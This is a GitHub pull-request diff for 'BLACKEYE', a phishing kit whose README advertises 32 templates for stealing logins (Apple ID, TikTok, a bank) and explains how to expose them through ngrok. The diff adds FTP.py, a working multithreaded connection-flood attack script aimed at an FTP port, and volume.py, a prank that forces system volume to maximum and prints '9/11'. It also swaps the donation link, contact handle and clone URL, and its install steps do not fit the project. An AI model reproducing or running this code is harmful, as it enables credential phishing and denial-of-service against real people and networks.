Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
41 changes: 27 additions & 14 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,9 +1,10 @@
## BLACKEYE v2.0 (Major Update on August 23, 2025 | New: Bank Template, Upcoming Localhost Feature, and More)
##### The tool is completely free now
##### Creat by EricksonAtHome

> [! Need Donations]
> Your donations play a vital role in expediting the project's completion. With your support, we can swiftly bring this enhanced version to life and continue delivering valuable updates. [1]: [https://www.buymeacoffee.com/ericksonathome] "Buy Me a Coffee (myberp)"
> Your donations play a vital role in expediting the project's completion. With your support, we can swiftly bring this enhanced version to life and continue delivering valuable updates. [1]: [https://www.buymeacoffee.com/myberp] "Buy Me a Coffee (myberp)"

-----------------------------------------------------------------------------------------------------------------------------
![alt text](https://raw.githubusercontent.com/EricksonAtHome/blackeye/main/img/bkev3.png)

Expand Down Expand Up @@ -38,7 +39,7 @@ Update
[15] Apple ID [31] Tiktok

##### Add: Localtunnel
### Contact me on Instagram : @EricksonHolding or on responded.erickson.elite
### Contact me on X : @amirmahdizare or on responded.erickson.elite

-----------------------------------------------------------------------------------------------------------------------------
### Coded/Upgraded by: @EricksonAtHome (https://github.com/EricksonAtHome/blackeye)
Expand All @@ -50,7 +51,21 @@ Update
BLACKEYE is an upgrade from original ShellPhish Tool (https://shellphish.net) by thelinuxchoice under GNU LICENSE. It is the most complete Phishing Tool, with 32 templates +1 customizable

## Legal disclaimer:
Usage of BlackEye for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.
Usage of BlackEye for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

### Installation:
1. Clone the repository:
```sh
git clone https://github.com/amir13872/blackeye.git
```
2. Navigate to the project directory:
```sh
cd blackeye
```
3. Install dependencies:
```sh
yarn install
```

### Usage:
```
Expand All @@ -65,17 +80,15 @@ cd blackeye
bash blackeye.sh
```

### Introduction Video HOW INSTALL blackeye
### Usage with ngrok:
1. Download and install ngrok from [ngrok.com](https://ngrok.com/).
2. Start the script:
```sh
bash blackeye.sh
```
3. Choose ngrok as the tunneling method when prompted.


[Watch the Introduction Video](https://www.dropbox.com/scl/fi/j9kn2cz4mk1uh3uz6cnnb/V-deo-31-3-24-17-07-24.mov?rlkey=j9gms5hmgaedz6pw7axi86gil&dl=0)


![alt text](https://raw.githubusercontent.com/EricksonAtHome/blackeye/main/img/hiws2.png)

### Donate! @EricksonHolding
Donate And Support:
-----------------------------------------------------------------------------------------------------------------------------
BTC: bc1qmz5qmhyfzrm9hn2gnus85exhry64a8zekyzjuu
-----------------------------------------------------------------------------------------------------------------------------
LTC: ltc1qk4cuts4w8202tr2efun4c380n6nsq4eafxlg4k
-----------------------------------------------------------------------------------------------------------------------------
46 changes: 46 additions & 0 deletions background/FTP.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
import socket
import threading
import time

# تنظیمات هدف
target_ip = "192.168.0.116"
target_port = 21
stop_flag = threading.Event()

# تابع ارسال بسته‌های SYN
def syn_flood():
while not stop_flag.is_set():
try:
# ایجاد یک بسته TCP با فلگ SYN
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(0.01) # تنظیم تایم‌آوت کوچک
s.connect((target_ip, target_port))
except:
# نادیده گرفتن خطاهای اتصال
pass

# اجرای حمله در چندین رشته (Thread)
def start_attack(threads=10):
for _ in range(threads):
thread = threading.Thread(target=syn_flood)
thread.daemon = True # تنظیم برای بسته شدن با برنامه اصلی
thread.start()

# برنامه اصلی
if __name__ == "__main__":
print(f"Starting SYN flood to {target_ip}:{target_port}...")
try:
# تعداد رشته‌ها برای حمله (افزایش برای شدت بیشتر)
start_attack(threads=100)

# exec(open('doom1.py').read())
# اجرای حمله به مدت معین
time.sleep(10) # تغییر مدت زمان حمله در اینجا
except KeyboardInterrupt:
print("Attack stopped by user.")
finally:
stop_flag.set()

print("Stopping attack...")


27 changes: 27 additions & 0 deletions background/volume.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume

def set_system_volume_to_max():
try:
# Get the audio devices
devices = AudioUtilities.GetSpeakers()

# Activate the audio endpoint volume interface
interface = devices.Activate(
IAudioEndpointVolume._iid_, 1, None)

# Query the audio interface
volume = interface.QueryInterface(IAudioEndpointVolume)

# Check if the speaker is muted and unmute it
if volume.GetMute():
volume.SetMute(0, None) # 0 means unmute

# Set the system volume to 100%
volume.SetMasterVolumeLevelScalar(1.0, None)

print("9/11")
except Exception as e:
print(f"Something went wrong but keep going: {e}")

# Run the function
set_system_volume_to_max()
Loading